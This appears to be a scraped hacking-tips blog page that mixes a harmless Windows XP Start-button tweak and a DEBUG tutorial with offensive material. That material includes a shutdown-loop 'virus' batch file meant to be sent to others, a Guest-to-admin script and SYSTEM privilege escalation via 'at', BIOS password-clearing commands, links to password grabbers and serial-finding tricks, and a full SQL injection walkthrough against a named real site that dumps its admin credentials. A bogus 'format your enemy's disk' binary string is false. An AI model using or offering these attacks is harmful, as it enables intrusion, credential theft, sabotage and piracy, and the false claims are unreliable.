ctrl+shift+b ---->to hear the whole topic
ctrl+shift+v ---->to hear the page

Change text on xp start button!

How to change text on XP 'Start Button'? frnds u can change text on that start button & u can write ur own text write ur name or anything which u like to write on it.. Isn't a cool trick..

Follow the given below steps.

Step 1 - Modify Explorer.exe File

In order to make the changes, the file explorer.exe located at C:\Windows needs to be edited. Since explorer.exe is a binary file it requires a special editor. For purposes of this article I have used Resource Hacker. Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Microsoft Windows 95/98/ME, Windows NT, Windows 2000 and Windows XP operating systems.

get this from h**p://delphi.icm.edu.pl/ftp/tools/ResHack.zip

The first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exe.

The category we are going to be using is "String Table". Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable. We’re going to modify item 578, currently showing the word “start” just as it displays on the current Start button.

There is no magic here. Just double click on the word “start” so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entry. In my case I used Click Me!

You’ll notice that after the new text string has been entered the Compile Script button that was grayed out is now active. I won’t get into what’s involved in compiling a script, but suffice it to say it’s going to make this exercise worthwhile. Click Compile Script and then save the altered file using the Save As command on the File Menu. Do not use the Save command – Make sure to use the Save As command and choose a name for the file. Save the newly named file to C:\Windows.


Step 2 – Modify the Registry

!!!make a backup of your registry before making changes!!!

Now that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open field. Navigate to:

HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogon

In the right pane, double click the "Shell" entry to open the Edit String dialog box. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.

Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.[/b]

Enjoy by keeping ur own text!!!!1

Find serials/product keys for anything in google

Crack or find any serial for what you want(softwares,games etc).. This is the easiest way to find serials for all software or any other thing(anything), crack any serial for any software,games and many more...
Let us see how?
There is simple code for it you can easily remember '94FBR'(code)

If you want to find the serial for Windows XP Professional just type in google search...
"Windows XP Professional" 94FBR followed by enter key.

If you want to find the serial for MS OFFICE 2007 just type in google search...
"MS OFFICE 2007"94FBR followed by enter key.

Find any mp3 file which u want to hear or download .....
There is an another trick for finding mp3 files on web...
Let us see how?
There is simple code for it you can easily remember

If u want to find songs of om shanti om or any particular in this movie just type in google search or any search which u like
"index of/" "om shanti om" .mp3

Create a deadly virus!!

How to create or make or write virus are most common question running in or mind if we are a new learner...This is very simple i have given u a small virus code which creates a highly effected virus.....


@echo
:virus
echo VIIIIIRRRRUUUUSSSS
shutdown -s -t 200 -c "YOU'RE ********ED"
goto virus


copy and paste the above code into word pad and save its as .bat file and send the file to whom ever u want

Actually if u save this file in word pad it saves as a .doc file but to save it as a .bat file u have to save it as "virus.bat" within double quotes instead of virus u can write any name..

How to crack windows

Learn here how to crack or hack windows manually, debug: Learn how to crack windows, programs act manually.....

Debug is a program that comes with modern versions of DOS (I do not know when I started shipping out with DOS). Anyway, all Windows users should have it already.

It's a great tool for debuging programs, unassembling and cracking, and reading "hidden" memory areas like the boot sector, and much more.

The following was copied from an assembly tutorial who's author we cannot credit, because we have no idea who he is.

Get into DOS and type "debug", you will get a prompt like this:
-

now type "?", you should get the following response:
assemble A [address]
compare C range address
dump D [range]
enter E address [list]
fill F range list
go G [=address] [addresses]
hex H value1 value2
input I port
load L [address] [drive] [firstsector] [number]
move M range address
name N [pathname] [arglist]
output O port byte
proceed P [=address] [number]
quit Q
register R [register]
search S range list
trace T [=address] [value]
unassemble U [range]
write W [address] [drive] [firstsector] [number]
allocate expanded memory XA [#pages]
deallocate expanded memory XD [handle]
map expanded memory pages XM [Lpage] [Ppage] [handle]
display expanded memory status XS

Lets go through each of these commands:
Assemble:

-a
107A:0100

At this point you can start assembling some programs, just like using a assembler. However the debug assembler is very limited as you will probably notice. Lets try to enter a simple program:

-a
107A:0100 MOV AH,02
107A:0102 MOV DL,41
107A:0104 INT 21
107A:0106 INT 20
-g
A

Program terminated normally

That's the same program we did at the end of the previous chapter. Notice how you run the program you just entered with "g", and also notice how the set-up part is not there? That's because debug is just too limited to support that.
Another thing you can do with assemble is specify the address at which you want to start, by default this is 0100 since that's where all .COM files start.
Compare:

Compare takes 2 block of memory and displays them side by side, byte for byte. Lets do an example. Quite out of debug if you haven't already using "q". Now type "debug c:\command.com"

-c 0100 l 8 0200
10A3:0100 7A 06 10A3:0200

This command compared offset 0100 with 0200 for a length of 8 bytes. Debug responded with the location that was DIFFERENT. If 2 locations were the same, debug would just omit them, if all are the same debug would simply return to the prompt without any response.
Dump:

Dump will dump a specified memory segment. To test it, code that assembly program again:

C:\>debug
-a
107A:0100 MOV AH,02
107A:0102 MOV DL,41
107A:0104 INT 21
107A:0106 INT 20
-d 0100 l 8
107A:0100 B4 02 B2 41 CD 21 CD 20
...A.!.

The "B4 02 B2 41 CD 21 CD 20" is the program you just made in machine language.

B4 02 = MOV AH,02
B2 41 = MOV DL,41
CD 21 = INT 21
CD 20 = INT 20

The "...A.!." part is your program in ASCII. The "." represent non-printable characters. Notice the A in there.
Enter:

This is one of the hard commands. With it you can enter/change certain memory areas. Lets change our program so that it prints a B instead of an A.
-e 0103 <-- edit program at segment 0103 107A:0103 41.42 <-- change 41 to 42 -g B Program terminated normally - Wasn't that amazing? Fill: This command is fairly useless, but who knows.... It fills the specified amount of memory with the specified data. Lets for example clear out all memory from segment 0100 to 0108, which happens to be our program. -f 0100 l 8 0 <-- file offset 0100 for a length of 8 bytes with 0 -d 0100 l 8 <-- verify that it worked 107A:0100 00 00 00 00 00 00 00 00 ....... Yep, it worked. Go: So far we used go (g) to start the program we just created. But Go can be used for much more. For example, lets say we want to execute a program at 107B:0100: -r CS <-- set the CS register to point to 107B CS 107A :107B -g =100 You can also set breakpoints. -a <-- enter our original program so we have something 107A:0100 MOV AH,02 to work with 107A:0102 MOV DL,41 107A:0104 INT 21 107A:0106 INT 20 -g 102 <-- set up a break point at 107A:0102 At this point the program will stop, display all registers and the current instruction. Hex: This can be very useful. It subtracts and adds two hexadecimal values: -h 2 1 0003 0001 <-- 2h + 1+ = 3h and 2h - 1h = 1h This is very useful for calculating a programs length, as you will see later. Input: This is one of the more advanced commands, and I decided not to talk about it too much for now. It will read a byte of data from any of your computers I/O ports (keyboard, mouse, printer, etc). -i 3FD 60 - Your data may be different. In case you want to know, 3FD is Com port 1, also known as First Asynchronous Adapter. Load: This command has 2 formats. It can be used to load the filename specified with the name command (n), or it can load a specific sector. -n c:\command.com -l This will load command.com into debug. When a valid program is loaded all registers will be set up and ready to execute the program. The other method is a bit more complicated, but potential also more usefull. The syntax is L

-l 100 2 10 20

This will load starting at offset 0100 from drive C (0 = A, 1 = B, 2 = C, etc), sector 10h for 20h sectors. This can be useful for recovering files you deleted.
Move:

Move takes a byte from the starting address and moves it to the destination address. This is very good to temporary move data into a free area, than manipulate it without having to worry about affecting the original program. It is especially useful if used in conjunction with the r command to which I will get later. Lets try an example:
-a <-- enter our original program so we have something 107A:0100 MOV AH,02 to work with 107A:0102 MOV DL,41 107A:0104 INT 21 107A:0106 INT 20 -m 107A:0100 L 8 107B:0100 <-- more 8 bytes starting from 107A:0100 into 107B:0100 -e 107B:0103 <-- edit 107B:0103 107B:0103 41.42 <-- and change it 42 ( -d 107A:0100 L 8 <-- make sure it worked 107A:0100 B4 02 B2 41 CD 21 CD 20 ...A.!. -d 107B:0100 L 8 107A:0100 B4 02 B2 42 CD 21 CD 20 ...B.!. -m 107B:0100 L 8 107A:0100 <-- restore the original program since we like the changes. Name: This will set debug up with a filename to use for I/O commands. You have to include the file extension, and you may use addition commands: -n c:\command.com Output: Exactly what you think it is. Output sends stuff to an I/O port. If you have an external modem with those cool lights on it, you can test this out. Find out what port your modem is on and use the corresponding hex number below: Com 1 = 3F8 - 3FF (3DF for mine) Com 2 = 2F8 - 2FF Com 3 = ??? - ??? (if someone knows, please let me know) Now turn on the DTA (Data Terminal Ready) bit by sending 01h to it: -o XXX 1 <-- XXX is the com port in hex As soon as you hit enter, take a look at your modem, you should see a light light up. You can have even more fun with the output command. Say someone put one of those BIOS passwords on "your" computer. Usually you'd have to take out the battery to get rid of it, but not anymore: MI/AWARD BIOS -o 70 17 -o 71 17 QPHOENIX BIOS -o 70 FF -o 71 17 QGENERIC -o 70 2E -o 71 FF These commands will clear the BIOS memory, thus disabling the password. Proceed: Proceeds in the execution of a program, usually used together withy Trace, which I will cover later. Like the go command, you can specify an address from which to start using =address -p 2 Debug will respond with the registers and the current command to be executed. Quite: This has got to be the most advanced feature of debug, it exits debug! -q Register: This command can be used to display the current value of all registers, or to manually set them. This is very useful for writing files as you will see later on. -r AX AX: 011B :5 - Search: Another very useful command. It is used to find the occurrence of a specific byte, or series of bytes in a segment. The data to search for can by either characters, or a hex value. Hex values are entered with a space or comma in between them, and characters are enclosed with quotes (single or double). You can also search for hex and characters with the same string: -n c:\command.com <-- load command.com so we have some data to search in -l -s 0 l 0 "MS-DOS" <-- search entire memory block for "MS-DOS" 10A3:39E9 <-- found the string in 10A3:39E9 NOTE: the search is case sensitive! Trace: This is a truly great feature of debug. It will trace through a program one instruction at a time, displaying the instruction and registers after each. Like the go command you can specify where to start executing from, and for how long. -a <-- yes, this thing again 107A:0100 MOV AH,02 107A:0102 MOV DL,41 107A:0104 INT 21 107A:0106 INT 20 -t =0100 8 If you leave out the amount of instructions that you want to trace, you can use the proceed (p) to continue the execution as long as you want. Unassemble: Unassembles a block of code. Great for debugging (and cracking) -u 100 L 8 <-- unassembles 8 bytes starting at offset 100 107A:0100 MOV AH,02 <-- debut's response 107A:0102 MOV DL,41 107A:0104 INT 21 107A:0106 INT 20 Write: This command works very similar to Load. It also has 2 ways it can operate: using name, and by specifying an exact location. Refer to back to Load for more information. NOTE: The register CX must be set the file size in order to write! NOTE: Write will not write .EXE or .HEX files.[SIZE=7][SIZE=14]

Hack admin from xp guest account(Thats possible )

Well thats possible ..
Please Dont missuse This ARTICLE. Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.
HaCk "GUEST" with Admin privileges........


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...


~ Cheers ~



* Haking "admin" from "user" mode n more



really that is possible !

u know why is it a "user" account because it lacks come service layer than that in "administrator" account

Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.

Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).

The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager

Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:


You can trick the system into running a program, script, or batch file with system level privileges.

One sample

One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.

Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.


Quote:

In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.


Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at

If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:

Code:
at 15:25 /interactive “cmd.exe”

Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:

When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:

You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:

Code:
explorer.exe



A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):

System user name on start menu


explorer.exe running under SYSTEM

What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.





ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.


EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Format your enemy's hard disk!

How to format hard disk?? It is very easy to format hard disk (with a file) of a person whom you don't like or u hate the most ..
just follow the given steps..
Step1.
Copy the below code as it is in 'notepad'

Code:

01001011000111110010010101010101010000011111100000


Step 2.
Save it as a EXE file with any name u like

Step 3.
Send that EXE file and format his hard disk

Download free hacking and cracking softwares

Download free hacking and cracking softwares...The names are tace ip,hide ip,account locker,anti-mail bomber,emotion creator,freeze account,msn block checker,hot hack,msn password recovery,password grabber,yahoo cracker,yahoo password grabber and many more...
i hope guys u like these softwares....

* rapidshare.com/files/84112082/AIO_Trace_Ip_toolz.rar
* rapidshare.com/files/91730792/Seria-of-Soft.rar
* rapidshare.com/files/91624959/hide_ip_plantinumwith_key.rar
* rapidshare.com/files/91023193/Account-Locker.rar
* rapidshare.com/files/91023633/Anti-Mail-Bomb.rar
* rapidshare.com/files/91024117/Emoticon_Creator.rar
* rapidshare.com/files/91025261/Frez-Accont.rar
* rapidshare.com/files/91027689/Kitle.rar
* rapidshare.com/files/91029795/Msn-Block-Checker.rar
* rapidshare.com/files/91032421/Proyect_Lithium_Version_0.2.0.rar
* rapidshare.com/files/91033497/skinnerv12setup.rar
* rapidshare.com/files/91025674/Hot-Hack.rar
* rapidshare.com/files/91026666/Hotmal-Kiler.rar
* rapidshare.com/files/91027055/Hotm-Crak.rar
* rapidshare.com/files/91028264/MSN7UniversalPatcherPlusPlus.rar
* rapidshare.com/files/91028827/Msn-_Dondurucu-hhhh.rar
* rapidshare.com/files/91029357/Msn-Auto-Responder.rar
* rapidshare.com/files/91030167/Msn-Clean.rar
* rapidshare.com/files/91030644/Msn-Pass-Grab.rar
* rapidshare.com/files/91031205/Msn-Pass-Recouvery.rar
* rapidshare.com/files/91031509/My-Pass.rar
* rapidshare.com/files/91035275/t__T__T8f_OnT2.rar
* rapidshare.com/files/91035276/Yaho-Boter.rar
* rapidshare.com/files/91035277/yahoocrack.rar
* rapidshare.com/files/91035278/Yaho-Web-Hak.rar

Hackers Secret Tools and Books:


Website counter




Hackers Secret Tools and Books:


* google_hack. 100 tips and tools:
* http://rapidshare.com/files/59406147/google_hack._100_tips_and_tools.pdf
* 300_keygen:
* http://rapidshare.com/files/60459159/300_keygen.rar
* Hackers_Secrets:
* http://rapidshare.com/files/59323690/Hackers_Secrets.rar
* DAP_PREMIUM_v8.1.2.1:
* http://rapidshare.com/files/63545122/DAP_PREMIUM_v8.1.2.1.rar
* 2500_Best_Ebooks_Collection_2007:
* http://rapidshare.com/files/63545031/2500_Best_Ebooks_Collection_2007.htm

Hacking Websites by SQL Injection


Website counter



To understand what is an SQL Database, the very simple thing i can explain to you is the “website where you can register, login or create your own profile. Because it will save the data you input into your profile and will execute / display them whenever you provide the correct username or the password. So in the same way the website i mentioned above will give you a chance to be a part of it, it will update you daily about respective news.

1. How to check if the website is vulnerable to SQL Injection?
A:
On most of the website i read people saying that try to add “`” at the end [without quotes], and if you get some error that means that the website is vulnerable to SQL Injection. But being an experienced guy in the penetration, i’d rather tell you that this is a TOTAL MYTH. The best way to check the site vulnerability is to add “+order+by+6753″ at the end of the URL. Because, 97% of the websites don’t have more then 6753. columns. So by adding 6753 number, you will check if it has 6753 columns, which it apperatenly doesn’t have. So it will give you an error, and if it does that means that the WEBSITE IS VULNERABLE. It is generally noticed that a website doesn’t have more than 100 columns at the most in its database. So by entering the number 6753, you are trying to make it sure if the website gives you an error with it. IF it does that means you can proceed further. To check an SQL Injection, its mandatory that the website should be pointing it self to some specific page, i.e. “website.com/index.php?page=11″. So in this case the website is pointing it self to page Number.11 to pull up some specific information. So, to check if the website is vulnerable or not, you can try with the following URL. i.e. “website.com/index.php?page=11+order+by+6753″.

2. How would i find the vulnerable websites?
A.: Google is the best friend of Hackers
, when I say this don’t assume that i am just writing it because i am supposed it. I really mean it. There is something called as “google dorks”, which are basically a command which could be put into the Google search to find out specific groups of pages.
here are some Google dorks which you may try to find out the vulnerable websites.
a. inurl:index.php?page=
b. inurl:members.php?member=
c. inurl:index.php?id=
d. inurl:articles.php?page=

This will help you to find out the websites which are connected and working with SQL Databases at the backend. Some of them might be vulnerable to SQL Injection. So you can try to put “order+by+6753″ at the end of the URL to check if its vulnerable.

Step 1 : Finding Vulnerable Page.

Lets start, as you’ll know the website that i will test today is www.RfidUpdate.com. So lets open up the website in the browser. So just a little information about website, RFID means “radio frequency identification”. So on the right hand side you will see that it gives you an opportunity to subscribe to the website. So now it should give you an idea that when you subscribe to it, there has to be a place where your E-mail address should be saved, so it has to have a database! So, now we know that the website is supported by an SQL Database at the backend. So we are on the right track.

As I have written earlier, in order to perform an SQL Injection we will have to find a page that has “something.php?id=2121″ at the end of the URL, so we will try to find such page on RfidUpdate.com. I have found a page by exploring the website a bit. The URL of the page is,

http://www.rfidupdate.com/articles/index.php?id=1563

So now, we know it has an SQL Database and we have the apge where we can start with.

So lets try to check if the website is vulnerable to SQL Attack, we will try to add “+order+by+6753–” as i have written earlier.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+6753–

Now, you should have noticed an error, which says :
“Error 1054: Unknown column ‘6753′ in ‘order clause’”

So, It means that the database gave u a message saying “there is no such column”. So error doesn’t really make any difference, but the main thing we should notice is that the database communicated with us directly. So there is a possibility that we can exploit it.

Step 2 : Finding Number of Columns.

Now, the next thing we will try is to find the out many columns do this page have. So now, instead of “6753″, we will start from number 1 then 5 then 15, we will keep doing this unless we get some error. So, try the following url.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+1–

The webpage opened up fine, which means that the website has more then 1 column, now try number 5.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+5–

Same thing, now try 10.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+10–

Still no error, try 15.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+15–

Still no error :( , try 20.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+20--

WHOA!, We got the error, which means that the number of columns in the webpage is between 15 to 20. So lets try with number “16″ now.

http://www.rfidupdate.com/articles/index.php?id=1563+order+by+16–

YAY!, you got the error on number “16″ as well. Which means, that the website has 15 columns. So now lets move further.

Step 3 : Using “Union Select All” Command.

Now, we will try to combine all the columns and we will see what do we get, the command goes as follow:-

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15–

FYI:- please notice tha ti have added “-” before 1563.

Now you see some broken things in there, and now you see that the only indipendent number of column you see on the website is “7″. So apperantly that would be the base of the attack. Everything we do now, would be done with the column number “7″.

So we wil ltry to find the some more information about the DATABASE this website is using, so to do this we can replace the column number 7 with “@@version“, without quotes ofcourse. So try this now.

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13,14,15–

This is what you should see now,
5.0.67-community

Which means, that the website is using SQL Version > 5. Now, try following URL to move further.

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15+from%20information_schema.tables%20where%20table_Schema=database%20()–

Here, we have replaced No.7 column with “group_concat(table_name)” and we have added “from information_schema.tables where table_Schema=database ()” at the end. Which are basically the standard commands for SQL, to get the further information from the specific column.

YAY! You should have already noticed that the name of the further columns have appeared in the list and one of them is “ru_Admin”. Thats what we are looking for. Since we have the column for admin now, we will try to find out the username and password out of it. So let try following URL into the address bar.

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(column_name),8,9,10,11,12,13,14,15+from%20information_schema.columns%20where%20table_Schema=database%20()–

The only thing we’ve changed here is the “tables” to “columns”, and you should see all the information about the admin’s tables now which should look something like following.

“ru_Admin_Username,ru_Admin_Password”

So we see, we might be able to crack the username as well as the password. In order to see the information inside the username and the password column lets put following URL:

http://www.rfidupdate.com/articles/index.php?id=-1563+union+all+select+1,2,3,4,5,6,group_concat(ru_Admin_username,0×3a,ru_Admin_password),8,9,10,11,12,13,14,15+from%20ru_Admin–

What we did is, to replace the columns names with admin_username & admin_password, and call it from ru_Admin column at the end.


VOILA! What you’re looking at right now the “admin” username and the password in following format.

username : password.

admin:admRIvuxHahkQ

FYI: Wherever you see “%20″ in the URL, that means a SPACE in the address bar.

So you have the password now, you can use it the way you want!.

So this the way to perform an SQL Injection attack. You may try your own stuffs with the google dorks i posted in the beginning. Use it the way you want, just keep in mind that if u know 80/100, there are people out there who know 90/100. So better secure your self first, and try these attacks with the permission of the site owners.